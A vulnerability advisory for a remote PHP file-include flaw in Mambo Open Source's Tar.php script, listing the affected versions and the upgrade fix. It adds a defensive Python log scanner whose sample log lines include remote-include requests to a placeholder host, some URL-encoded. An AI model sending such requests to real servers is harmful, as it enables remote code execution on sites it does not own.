Mambo Open Source Tar.PHP Remote File Include Vulnerability
BID:12608
Info
| Bugtraq ID: | 12608 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 21 2005 12:00AM |
| Updated: | Feb 21 2005 12:00AM |
| Credit: | The discoverer of this vulnerability is not known. |
| Vulnerable: | Mambo Mambo Open Source 4.5.2; Mambo Mambo Open Source 4.5.1 (1.0.9); Mambo Mambo Open Source 4.5.1; Mambo Mambo Open Source 4.5 (1.0.3beta); Mambo Mambo Open Source 4.5 (1.0.3); Mambo Mambo Open Source 4.5 (1.0.2); Mambo Mambo Open Source 4.5 (1.0.1); Mambo Mambo Open Source 4.5 (1.0.0); Mambo Mambo Open Source 4.0.14 |
| Not Vulnerable: | Mambo Mambo Open Source 4.5.2.1 |
Discussion
It is reported that Mambo Open Source is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'Tar.php' script.
Remote attackers could potentially exploit this issue to include a remote malicious PHP script, which will be executed in the context of the Web server hosting the vulnerable software.
This issue reportedly affects Mambo Open Source version 4.5.2 and earlier.
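To check whether a site was probed before it was upgraded, a defender can search the web server access log for requests to 'Tar.php' that carry a URL as a parameter value. The following is an added example, not code from the advisory or from the Mambo project; the advisory does not name the affected parameter or the script's directory, so the parameter name `param`, the `/PLACEHOLDER/` path and the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter values that would point a PHP include at another host.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

def remote_include_params(target):
    """Return [(name, value)] for URL-valued parameters sent to Tar.php."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return []
    if unquote(parts.path).rsplit('/', 1)[-1].lower() != 'tar.php':
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; also flag values that only become a URL
        # after a second decode, in case a proxy or the application decodes again.
        if REMOTE_VALUE_RE.match(value) or REMOTE_VALUE_RE.match(unquote(value)):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(client_ip, target, hits)] for each suspicious log line."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = remote_include_params(m.group('target'))
        if hits:
            findings.append((line.split(' ', 1)[0], m.group('target'), hits))
    return findings

# Constructed sample log lines (documentation IPs, placeholder path and parameter).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2005:10:00:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Feb/2005:10:01:12 +0000] "GET /PLACEHOLDER/Tar.php?param=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.0" 200 312',
    '198.51.100.7 - - [21/Feb/2005:10:01:40 +0000] "GET /PLACEHOLDER/tar.php?param=%2568ttp%3A%2F%2Fexample.invalid%2Fx HTTP/1.0" 200 0',
    '192.0.2.44 - - [21/Feb/2005:10:02:03 +0000] "GET /PLACEHOLDER/Tar.php?param=archive.tar HTTP/1.1" 200 77',
]

if __name__ == '__main__':
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target, hits)
```

A hit only shows that a request was made; whether the include succeeded depends on the installed version and the server's PHP configuration.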
Exploit / POC
No exploit is required.
Solution / Fix
Solution:
The vendor has released version 4.5.2.1 to address this issue. The same upgrade is listed for each affected release:
- Mambo Mambo Open Source 4.0.14
- Mambo Mambo Open Source 4.5 (1.0.2)
- Mambo Mambo Open Source 4.5 (1.0.3beta)
- Mambo Mambo Open Source 4.5 (1.0.1)
- Mambo Mambo Open Source 4.5 (1.0.0)
- Mambo Mambo Open Source 4.5 (1.0.3)
- Mambo Mambo Open Source 4.5.1
- Mambo Mambo Open Source 4.5.1 (1.0.9)
- Mambo Mambo Open Source 4.5.2
Upgrade: Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
References
References:
- Mambo Open Source Homepage (Mambo)